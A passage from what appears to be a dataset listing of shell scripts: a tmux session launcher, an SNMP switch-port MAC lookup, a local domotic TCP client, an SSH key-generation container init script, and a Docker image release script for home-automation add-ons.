               tmux new-window -t "${TMUX_NAME}:${i}" -n "SRC"
            ;;
            4) cd $HOME/src/lg_chef
               echo "...Creating window: CHEF"
               tmux new-window -t "${TMUX_NAME}:${i}" -n "CHEF"
            ;;
            5) cd $HOME/src/lg_chef
               echo "...Creating window: ${i}"
               tmux new-window -t "${TMUX_NAME}:${i}"
            ;;
            *) cd $HOME
               echo "...Creating window: ${i}"
               tmux new-window -t "${TMUX_NAME}:${i}"
            ;;
        esac
    done
else
    echo "Existing tmux session found: ${TMUX_NAME}"
fi

# Join tmux
echo "Attaching to tmux: ${TMUX_NAME}"
xfce4-terminal --geometry 225x54+42+52 --command="tmux att -t ${TMUX_NAME}" #-c tmux select-window -t 1"
| true
|
b63810112e18db09f3e44976e9221ef4994d96bc
|
Shell
|
kijisky/zabbix_templates
|
/snmp-macaddress-table/snmp_macaddr_name.sh
|
UTF-8
| 737
| 3.375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Resolve the switch interface (name + description) on which a given MAC
# address was learned, via SNMP BRIDGE-MIB / IF-MIB lookups.
# Usage: snmp_macaddr_name.sh <ip> <community> <mac-as-dotted-decimal-suffix>
snmp_ipaddress=$1
snmp_comunity=$2
macaddress=$3
# dot1dTpFdbPort (BRIDGE-MIB): bridge port the MAC address was learned on.
bridge_port=`snmpget -Ov -v1 -c $snmp_comunity $snmp_ipaddress 1.3.6.1.2.1.17.4.3.1.2.$macaddress 2>/dev/null`
if [ "$bridge_port" = "" ]; then
        echo Mac Address $macaddress not found;
        exit;
fi;
# Keep only the numeric value after "INTEGER:".
bridge_port=`echo $bridge_port | cut -d':' -f 2 | sed 's/^ //g'`
#echo $bridge_port
# dot1dBasePortIfIndex (BRIDGE-MIB): map bridge port -> interface index.
if_port=`snmpget -Ov -v1 -c $snmp_comunity $snmp_ipaddress .1.3.6.1.2.1.17.1.4.1.2.$bridge_port | cut -d' ' -f 2`
#echo $if_port
# ifDescr (IF-MIB): interface name.
if_name=`snmpget -Ov -v1 -c $snmp_comunity $snmp_ipaddress .1.3.6.1.2.1.2.2.1.2.$if_port | cut -d '"' -f 2`
echo $if_name
# ifAlias (IF-MIB): the administrator-configured port description.
if_descr=`snmpget -Ov -v1 -c $snmp_comunity $snmp_ipaddress 1.3.6.1.2.1.31.1.1.1.18.$if_port 2>/dev/null | cut -d":" -f 2`
echo $if_descr
| true
|
dd4956c545ca283a929fd7e1558137a371899b3a
|
Shell
|
lorenzofailla/Domotic-Linux-Deploy
|
/scripts/domotic-gettcpreply
|
UTF-8
| 1,110
| 3.875
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# Send a command (header + body) to the local domotic TCP service and print
# its reply.
# Usage: domotic-gettcpreply <command-header> <command-body>

# Bug fix: this script is domotic-gettcpreply; the usage message previously
# named "domotic-sendtcpmsg".
SCRIPT_NAME="domotic-gettcpreply"
CONFIG_FILE_PATH="/etc/domotic/domotic.conf"

ERRCODE___WRONG_NUMBER_OF_PARAMETERS=1
ERRCODE___NO_CONFIG_FILE=2

# Verify that exactly two arguments were given; otherwise print an error
# message and exit.
if [ $# != 2 ]; then

	echo "Wrong number of parameters passed. Expected: 2, Actual: $#
Usage: $SCRIPT_NAME command-header command-body"
	exit $ERRCODE___WRONG_NUMBER_OF_PARAMETERS

fi

# Verify that the configuration file exists; if not, print an error message
# and exit.
if [ ! -f "$CONFIG_FILE_PATH" ]; then

	echo "Configuration file $CONFIG_FILE_PATH cannot be found."
	exit $ERRCODE___NO_CONFIG_FILE

fi

# TODO: read the port number from the configuration file.
PORT=9099

# Bug fix: the nc invocation previously hard-coded 9099 instead of $PORT.
REPLY=$(
nc localhost "$PORT" << EOF
@MODE-EXITATCOMMAND
@COMMAND?header=$1&body=$2
EOF
)

echo -n "$REPLY"
| true
|
ba476fa23e6fcc06aeb95fa25d5b91d43fd40d96
|
Shell
|
alreece45/docker-images
|
/ssh-keygen/ubuntu_trusty/opt/init
|
UTF-8
| 1,360
| 3.796875
| 4
|
[] |
no_license
|
#!/bin/bash
# Generate an SSH key pair (if one does not exist yet) and append its public
# key to an authorized_keys file.  Configuration comes from the environment:
#
#   KEYS_FILE    (required) authorized_keys file to append to
#   KEY_FILE     (required) private key path; public key is "$KEY_FILE.pub"
#   PASSPHRASE   optional key passphrase (empty string = no passphrase)
#   KEY_TYPE     optional key type      (ssh-keygen -t)
#   KEY_BITS     optional key size      (ssh-keygen -b)
#   KEY_COMMENT  optional key comment   (ssh-keygen -C)
#   KEYGEN_OPTS  optional extra ssh-keygen options (word-split)
#   KEY_USER     optional owner for the generated key files
#   KEY_GROUP    optional group for the generated key files
#   KEY_OPTIONS  optional options prefix for the authorized_keys entry
entropy_avail=$(cat /proc/sys/kernel/random/entropy_avail)
if [ "$entropy_avail" -lt 256 ]
then
echo "Warning: Low amount of entropy available: $entropy_avail"
fi
validates=1
if [ -z "$KEYS_FILE" ]
then
echo 'Error: $KEYS_FILE (authorized_keys file) undefined'
validates=0
fi
if [ -z "$KEY_FILE" ]
then
echo 'Error: $KEY_FILE (private key file) undefined'
# Fix: this assignment was missing, so the script carried on with an
# empty $KEY_FILE after printing the error.
validates=0
fi
if [ $validates -eq 0 ]
then
exit 255
fi
if [ ! -f "$KEY_FILE" ]
then
# Fix: was "ikeygen_opts=()" (typo), leaving the real array implicitly
# created by the += below.
keygen_opts=()
keygen_opts+=(-q)
keygen_opts+=(-f "$KEY_FILE")
if [ -n "$PASSPHRASE" ]
then
keygen_opts+=(-N "$PASSPHRASE")
else
PASSPHRASE=''
keygen_opts+=(-N '')
fi
if [ -n "$KEY_TYPE" ]
then
keygen_opts+=(-t "$KEY_TYPE")
fi
if [ -n "$KEY_BITS" ]
then
# Fix: was "$BITS", an undefined variable; the check reads $KEY_BITS.
keygen_opts+=(-b "$KEY_BITS")
fi
if [ -n "$KEY_COMMENT" ]
then
keygen_opts+=(-C "$KEY_COMMENT")
fi
if [ -n "$KEYGEN_OPTS" ]
then
# Intentional word-splitting: KEYGEN_OPTS may contain several options.
# (The old string assignment collapsed the array into a single word.)
keygen_opts+=($KEYGEN_OPTS)
fi
ssh-keygen "${keygen_opts[@]}"
echo "Generated Key: $(ssh-keygen -l -f "$KEY_FILE")"
if [ -n "$KEY_USER" ]
then
chown "$KEY_USER" "$KEY_FILE" "$KEY_FILE.pub"
fi
if [ -n "$KEY_GROUP" ]
then
# Fix: was "chown $KEY_GROUP", which set the *owner* to the group name;
# chgrp changes the group as intended.
chgrp "$KEY_GROUP" "$KEY_FILE" "$KEY_FILE.pub"
fi
fi
# Append "[options] <public-key> [comment]" to the authorized_keys file.
# $KEY_OPTIONS and $KEY_COMMENT stay unquoted on purpose: they may be empty
# or contain several words.
echo $KEY_OPTIONS "$(ssh-keygen -y -f "$KEY_FILE")" $KEY_COMMENT >> "$KEYS_FILE"
| true
|
6a750a771e7d1748085a189eb3564254dab04fca
|
Shell
|
anwyn/systemd.user
|
/user-environment-generators/jack-environment-generator
|
UTF-8
| 953
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/sh
# systemd user environment generator for JACK: reads the JACK engine
# settings (rate, nperiods, period, device) from ~/.config/jack/conf.xml
# and either prints them as NAME=value pairs or, with --export, pushes
# them into the systemd user environment as JACK_RATE, JACK_NPERIODS,
# JACK_PERIOD and JACK_DEVICE.
#
# Usage: jack-environment-generator [--export]
doexport=
if [ "$1" = "--export" ]
then
doexport=true
shift
fi
for parm in rate nperiods period device; do
# Build the target variable name, e.g. "rate" -> "JACK_RATE".
name=JACK_$(echo $parm | /usr/bin/tr 'a-z' 'A-Z')
# using jack_control will startup jack via dbus, we want to avoid this early in the startup sequence
# value=$(/usr/bin/jack_control dp | /bin/grep -e "^\ *${parm}:" | /bin/sed 's/.*:\(.*\))$/\1/')
# so we are picking the values directly from ~/.config/jack/conf.xml
value=$(/bin/grep "<option name=\"$parm\">" ~/.config/jack/conf.xml |
/bin/sed "s,^ *<option name=\"$parm\">\([^<]*\)</option>.*$,\1,")
if [ -n "$value" ]
then
# The config stores the device as a bare card number; prefix it with
# "hw:" to form an ALSA device name (e.g. "0" -> "hw:0").
test "$parm" = "device" && value=$(echo $value | /bin/sed 's/\([0-9][0-9]*\)/hw:\1/')
if [ "$doexport" = "true" ]
then
# Errors from systemctl are suppressed: the generator must not
# fail the startup sequence if the user bus is not ready yet.
/bin/systemctl --user set-environment $name="$value" >/dev/null 2>&1
else
echo $name="$value"
fi
fi
done
| true
|
0f272d82e935ee8d540f4b04e9dfcd38271c4b62
|
Shell
|
lapy/Hassio-Addons
|
/.scripts/release.sh
|
UTF-8
| 1,771
| 3.953125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Release (push) locally built add-on Docker images.
#
# For every add-on directory given on the command line:
#   * skip it when its config.json defines no build image,
#   * verify that a local image exists for every target architecture,
#   * push the versioned and "latest" tags (only on the master branch,
#     outside pull requests, or when FORCE_PUSH=true).
#
# Environment: ARCHS (optional arch override), FORCE_PUSH, TRAVIS_BRANCH,
# TRAVIS_PULL_REQUEST_BRANCH, DOCKER_USER, DOCKER_PASS, ANSI_* color codes.
set -e

for addon in "$@"; do
    if [[ "$(jq -r '.image' ${addon}/config.json)" == 'null' ]]; then
        echo "No build image set for ${addon}. Skip release!"
        # Fix: was "exit 0", which aborted the release of every remaining
        # add-on instead of skipping just this one.
        continue
    fi

    # Fix: the ARCHS fallback is re-evaluated per add-on.  It used to be
    # initialized once before the loop, so with $ARCHS unset the first
    # add-on's architecture list leaked into all following add-ons.
    archs="${ARCHS}"
    if [ -z "$archs" ]; then
        archs=$(jq -r '.arch // ["armv7", "armhf", "amd64", "aarch64", "i386"] | [.[] | .] | join(" ")' "${addon}/config.json")
    fi

    image_template=$(jq -r '.image' "${addon}/config.json")
    plugin_version=$(jq -r '.version' "${addon}/config.json")

    # Check the existence of all architecture images
    sum=0
    missing=0
    for arch in ${archs}; do
        image_name=${image_template/\{arch\}/$arch}
        sum=$((sum + 1))
        if [[ "$(docker images -q "$image_name:$plugin_version" 2> /dev/null)" == "" ]]; then
            echo -e "${ANSI_RED}No local image for $image_name found.${ANSI_CLEAR}"
            missing=$((missing + 1))
        else
            echo -e "${ANSI_GREEN}Local image $image_name found.${ANSI_CLEAR}"
        fi
    done

    if [ "$missing" -eq "$sum" ]; then
        echo 'Images for all architectures missing. Assuming no build and skip.'
        # Fix: was "exit 0"; skip only this add-on, keep releasing the rest.
        continue
    elif [ "$missing" -gt "0" ]; then
        # A partial build is an error: refuse to release an inconsistent set.
        echo -e "${ANSI_RED}There are $missing architecture images missing. Release failed!${ANSI_CLEAR}"
        exit 1
    fi

    if [[ "$FORCE_PUSH" = "true" ]] || { [[ "$TRAVIS_BRANCH" = 'master' ]] && [ -z ${TRAVIS_PULL_REQUEST_BRANCH} ]; }; then
        # Push the versioned and latest tags for every architecture.
        echo "$DOCKER_PASS" | docker login -u "$DOCKER_USER" --password-stdin
        for arch in ${archs}; do
            image_name=${image_template/\{arch\}/$arch}
            echo "Push $image_name..."
            docker push "$image_name:$plugin_version"
            docker push "$image_name:latest"
            echo "Pushed $image_name"
        done
    else
        echo 'Not master, skip docker push.'
    fi

    echo "Finished deployment of ${addon}"
done
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.